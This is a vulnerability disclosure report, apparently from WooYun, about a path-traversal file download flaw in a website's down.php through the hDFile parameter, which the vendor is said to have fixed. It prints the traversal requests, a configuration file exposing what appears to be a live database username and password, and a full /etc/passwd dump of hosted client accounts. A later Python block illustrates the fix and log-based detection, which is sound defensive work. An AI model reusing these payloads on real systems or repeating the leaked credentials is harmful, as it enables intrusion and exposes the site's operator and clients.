WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-13: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and relevant domain experts
2016-01-27: Vendor has fixed the vulnerability and disclosed it voluntarily; details made public
As stated in the title.
Target: http://**.**.**.**. Crafted request:
http://**.**.**.**/down.php?hDFile=../../down.php
Configuration file:
http://**.**.**.**/down.php?hDFile=../../include/php_script/common.php
Contents of common.php:
$DB_str = "mysql,localhost,Zongtai-WWW,zongtai,zongtaiZONGTAI22513338";
$NowWebSite = "http://**.**.**.**/";
$Config['UserFilesPath'] = '/smarteditupfiles/';
/etc/passwd:
http://**.**.**.**/down.php?hDFile=../../../../../../etc/passwd
Contents of passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:500:500::/home/mysql:/bin/false
mabubu:x:501:524::/Services/Files/upload_files/mabubu:/bin/false
sobdeall:x:502:524::/Services/Files/upload_files/sobdeall:/bin/false
sisso:x:503:524::/Services/Files/upload_files/sisso:/bin/false
mabubu_test:x:504:524::/Services/Files/upload_files_test/mabubu:/bin/false
sisso_test:x:505:524::/Services/Files/upload_files_test/sisso:/bin/false
kaloo:x:506:524::/Services/Files/upload_files/kaloo:/bin/false
teaman:x:507:524::/Services/Files/upload_files/teaman:/bin/false
booklife:x:508:524::/Services/Files/programing/booklife/upload_files:/bin/false
kaloo_test:x:509:524::/Services/Files/upload_files_test/kaloo:/bin/false
ponijohn:x:510:524::/Services/Files/programing/ponijohn/upload_files:/bin/false
teaman_test:x:511:524::/Services/Files/programing-test/teaman/upload_files/teaman:/bin/false
bestpals:x:512:524::/Services/Files/programing/bestpals/upload_files:/bin/false
lilliputiens:x:513:524::/Services/Files/programing/lilliputiens/upload_files:/bin/false
soapmaker:x:514:524::/Services/Files/programing/soapmaker/upload_files/soapmaker:/bin/false
lilliputiens_test:x:515:524::/Services/Files/programing-test/lilliputiens/upload_files/lilliputiens:/bin/false
minihope:x:516:524::/Services/Files/upload_files/minihope:/bin/false
ymr:x:517:524::/Services/Files/programing/ymr/upload_files/ymr/:/bin/false
ymr_test:x:518:524::/Services/Files/programing-test/ymr/upload_files/ymr:/bin/false
sisso-pos:x:519:524::/Services/Files/fonlego-pos/sisso:/bin/false
shangyu:x:520:524::/Services/Files/shangyu:/bin/false
masmas:x:521:524::/Services/Files/programing/masmas/upload_files/masmas:/bin/false
alatech:x:522:524::/Services/Files/programing/alatech/upload_files/alatech:/bin/false
minihope-pos:x:523:524::/Services/Files/programing/minihope/upload_files/minihope/pos_stock:/bin/false
minihope-mstc:x:524:525::/Services/Files/programing/minihope/upload_files/minihope/minihope-mstc:/bin/false
cht:x:525:526::/Services/Files/programing/cht:/bin/false
geagle:x:526:524::/Services/Files/programing/geagle/upload_files:/bin/false
joederek:x:527:527::/home/joederek:/bin/bash
gennies:x:528:524::/Services/Files/upload_files/gennies:/bin/false
gennies_wp_maternity:x:529:524::/Services/Files/programing-wp/gennies/maternity:/bin/false
gennies_wp_motherhood:x:530:524::/Services/Files/programing-wp/gennies/motherhood:/bin/false
gennies_wp_pregnancy:x:531:524::/Services/Files/programing-wp/gennies/pregnancy:/bin/false
lakeinsports:x:532:524::/Services/Files/programing/lakeinsports/upload_files/lakeinsports:/bin/false
gennies_wp_treasuremap:x:533:533::/Services/Files/programing-wp/gennies/treasuremap:/bin/false
cani:x:534:524::/Services/Files/upload_files/cani:/bin/false
alatech-en:x:575:524::/Services/Files/upload_files/alatech-en:/bin/false
goodhon:x:576:524::/Services/Files/upload_files/goodhon:/bin/false
zongtai-www:x:577:524::/Services/Files/programing/zongtai-www:/bin/false
gennies_wp_mommy-knowledge:x:578:524::/Services/Files/programing-wp/gennies/mommy-knowledge:/bin/false
mombabyfun:x:579:524::/Services/Files/upload_files/mombabyfun:/bin/false
mombabyfun-pos:x:580:524::/Services/Files/upload_files/mombabyfun/pos:/bin/false
lamalama:x:581:581::/Services/Files/upload_files/lamalama:/bin/false
lamalama-return711:x:582:524::/Services/Files/upload_files/lamalama/return711:/bin/false
buddybuddy-pos:x:583:583::/Services/Files/programing/buddybuddy/upload_files/buddybuddy/pos:/bin/false
buddybuddy:x:584:584::/Services/Files/upload_files/buddybuddy:/bin/false
pet_health_food:x:585:585::/Services/Files/programing-wp/buddybuddy/pet_health_food:/bin/false
dollbao:x:586:524::/Services/Files/upload_files/dollbao:/bin/false
sobdeall-pos:x:587:524::/Services/Files/upload_files/sobdeall/pos:/bin/false
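The root cause behind the three requests above is a download handler that appends the user-supplied hDFile value to a base directory without checking that the result stays inside it. The following Python block is an added illustration, not code from the affected site: it models that unchecked concatenation (vulnerable_resolve), places a lexical containment check beside it (resolve_download), and runs the same check over a few constructed access-log lines to flag traversal attempts against the hDFile parameter. The directory layout (/var/www/html/files/download as the download directory, two levels below the document root) and the log lines are assumptions chosen so that the report's own payloads resolve the way the report shows.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed download directory (hypothetical; chosen two levels below the web root
# so that "../../down.php" lands on the document root, as in the report).
DOWNLOAD_DIR = "/var/www/html/files/download"


def vulnerable_resolve(hdfile, download_dir=DOWNLOAD_DIR):
    """The pattern behind the report: base directory + user input, no containment check."""
    return posixpath.normpath(download_dir + "/" + hdfile)


def resolve_download(hdfile, download_dir=DOWNLOAD_DIR):
    """Return the path to serve, or None when the request would escape download_dir.

    The check is lexical (no filesystem access) so it runs offline; on a live
    system, apply the same prefix test to os.path.realpath() of the joined path
    as well, so that symlinks inside the download directory cannot bypass it.
    """
    decoded = unquote(hdfile)          # decode %2e%2e / %2f once, before checking
    if "\x00" in decoded:              # NUL bytes truncate paths in C-backed APIs
        return None
    base = download_dir.rstrip("/")
    # Strip a leading slash so an absolute value is treated as relative to the base.
    joined = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    prefix = base + "/"
    # After normalisation every "../" has been collapsed; anything that no longer
    # starts with the base directory (or equals it) has escaped and is refused.
    if not joined.startswith(prefix):
        return None
    return joined


# Constructed sample access-log lines (combined log format); not taken from the report.
LOG_LINES = [
    '203.0.113.5 - - [13/Jan/2016:10:01:02 +0800] "GET /down.php?hDFile=report.pdf HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Jan/2016:10:01:09 +0800] "GET /down.php?hDFile=../../down.php HTTP/1.1" 200 2210',
    '203.0.113.5 - - [13/Jan/2016:10:01:15 +0800] "GET /down.php?hDFile=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 4490',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_traversal_requests(lines):
    """Return the hDFile values (percent-decoded) that fail the containment check."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes values, so encoded "..%2F" is caught as well.
        for value in parse_qs(query).get("hDFile", []):
            if resolve_download(value) is None:
                hits.append(value)
    return hits


if __name__ == "__main__":
    for payload in ("report.pdf", "../../down.php", "../../../../../../etc/passwd"):
        print(f"{payload!r:40} unchecked -> {vulnerable_resolve(payload)}")
        print(f"{'':40} checked   -> {resolve_download(payload)}")
    print("flagged:", flag_traversal_requests(LOG_LINES))
```

The detection half is deliberately the same function as the fix: a request that the hardened handler would refuse is exactly the request worth alerting on, and decoding before the check keeps percent-encoded variants from slipping past a naive substring match for "../".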
Severity: High
Vulnerability Rank: 17
Confirmed: 2016-01-14 03:47
Thank you for the report.
2016-01-27: Fixed.